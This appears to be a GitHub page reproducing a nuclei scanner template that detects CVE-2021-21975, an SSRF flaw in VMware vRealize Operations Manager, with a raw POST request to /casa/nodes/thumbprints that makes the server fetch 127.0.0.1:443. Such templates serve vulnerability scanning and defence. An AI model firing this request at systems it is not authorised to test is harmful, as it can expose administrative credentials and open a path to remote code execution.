Skip to content

Latest commit

 

History

History
33 lines (29 loc) · 1.13 KB

CVE-2021-21975 SSRF.md

File metadata and controls

33 lines (29 loc) · 1.13 KB

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

id: CVE-2021-21975

info:
  name: vRealize Operations Manager API SSRF (VMWare Operations)
  author: luci
  severity: critical
  description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using CVE-2021-21983.
  tags: cve,cve2021,ssrf,vmware
  reference: https://www.vmware.com/security/advisories/VMSA-2021-0004.html

requests:
  - raw:
      - |
        POST /casa/nodes/thumbprints HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
        ["127.0.0.1:443/ui/"]
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "vRealize Operations Manager"
        part: body
      - type: status
        status:
          - 200

https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21975.yaml